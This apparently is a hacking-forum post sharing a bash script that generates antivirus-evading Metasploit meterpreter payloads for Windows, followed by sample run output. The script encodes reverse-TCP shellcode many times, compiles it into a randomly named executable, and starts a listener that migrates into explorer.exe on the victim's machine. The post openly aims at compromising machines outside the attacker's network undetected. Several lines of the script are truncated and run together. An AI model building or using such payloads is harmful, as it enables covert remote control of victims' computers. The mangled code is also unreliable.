Based on article to create fully undetectable metasploit payload,
i have modified the to payload to work with both WAN and LAN IP.
So it is possible to exploit a system outside a network 🙂

Code :

echo “************************************************************”
echo ” Automatic shellcode generator – FOR METASPLOIT ”
echo ” By Samin Yasar 2012 Modified ”
echo ” With some Randomic gravy and sauce to bypass Antivirus ”
echo ” // ”
echo “************************************************************”

Code :

rm -rf ShellCode

echo -e “1) LanIP \n2) WanIP?”
read netchoice
case $netchoice in
1) echo “Here is a network device list available on yor machine”
cat /proc/net/dev | tr -s ‘ ‘ | cut -d ‘ ‘ -f1,2 | sed -e ‘1,2d’
echo -e “What network interface are we gonna use ? \c”
read interface
IP=`ifconfig $interface | grep ‘inet addr:’| grep -v ‘’ | cut -d: -f2 | awk ‘{ print $1}’`;;
2) echo -e “======Getting your WAN IP=========”
IP=`wget -q -O – | cut -d ‘:’ -f2 | cut -d ‘ test.c
mkdir ShellCode
mv test.c ShellCode
cd ShellCode
#Replacing plus signs at the end of line
sed -e ‘s/+/ /g’ test.c > clean.c
sed -e ‘s/buf = /unsigned char micro[]=/g’ clean.c > ready.c
echo “#include ” >> temp
echo ‘unsigned char ufs[]=’ >> temp
for (( i=1; i> temp2
sed -i ‘s/$/”/’ temp2
sed -i ‘s/^/”/’ temp2
echo ‘;’ >> temp2
cat temp2 >> temp
cat ready.c >> temp
mv temp ready2.c
echo “;” >> ready2.c
echo “int main(void) { ((void (*)())micro)();}” >> ready2.c
mv ready2.c final.c
echo ‘unsigned char tap[]=’ > temp3
for (( i=1; i> temp4
sed -i ‘s/$/”/’ temp4
sed -i ‘s/^/”/’ temp4
echo ‘;’ >> temp4
cat temp4 >> temp3
cat temp3 >> final.c
rm -f clean.c
rm -f test.c
rm -f ready.c
rm -f rand.c
rm -f temp2
rm -f temp3
rm -f temp4

/usr/bin/i586-mingw32msvc-gcc -Wall ./final.c -o ./final.exe > /dev/null 2>&1
mv final.exe $RANDOM.exe
filex=`ls -ct1 | head -1`
sumx=`sha1sum $filex`
echo $filex “…generated in ShellCode subfolder”
echo $filex “sha1checksum is ..” $sumx
strip –strip-debug $filex
cd ..
echo ” starting the meterpreter listener…”
sleep 2
msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port AutoRunScript=’migrate.rb -n explorer.exe’ E

Save the file as
And set the permission to Execute :
Code :

root@t3amas5assin:~/Desktop# chmod +x
root@t3amas5assin:~/Desktop# ./
Automatic shellcode generator – FOR METASPLOIT
By Astr0baby 2011 Modified By DJ MAK 2012
With some Randomic gravy and sauce to bypass Antivirus
For Automatic Teensy programming and deployment
1) LanIP
2) WanIP?
======Getting your WAN IP=========
What Port Number are we gonna listen to? : 5676
Please enter a random seed number 1-10000, the larger the number the
larger the resulting executable : 1000
And lastly how many times do we want to encode our payloads 1-20? : 5
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)

[*] x86/jmp_call_additive succeeded with size 457 (iteration=1)

[*] x86/jmp_call_additive succeeded with size 489 (iteration=2)

[*] x86/jmp_call_additive succeeded with size 521 (iteration=3)

[*] x86/jmp_call_additive succeeded with size 553 (iteration=4)

[*] x86/jmp_call_additive succeeded with size 585 (iteration=5)

[*] x86/call4_dword_xor succeeded with size 614 (iteration=1)

[*] x86/call4_dword_xor succeeded with size 642 (iteration=2)

[*] x86/call4_dword_xor succeeded with size 670 (iteration=3)

[*] x86/call4_dword_xor succeeded with size 698 (iteration=4)

[*] x86/call4_dword_xor succeeded with size 726 (iteration=5)

[*] x86/shikata_ga_nai succeeded with size 753 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 780 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 807 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 834 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 861 (iteration=5)

31963.exe …generated in ShellCode subfolder
31963.exe sha1checksum is..675ee8fa2daf8533fe2c2ebe941de78948fa776a 31963.exe
starting the meterpreter listener…

As soon as the the payload is executed on the Victims machine
it will automatically migrate to explorer.exe Process

The payload is almost undetectable from most of the virus Engines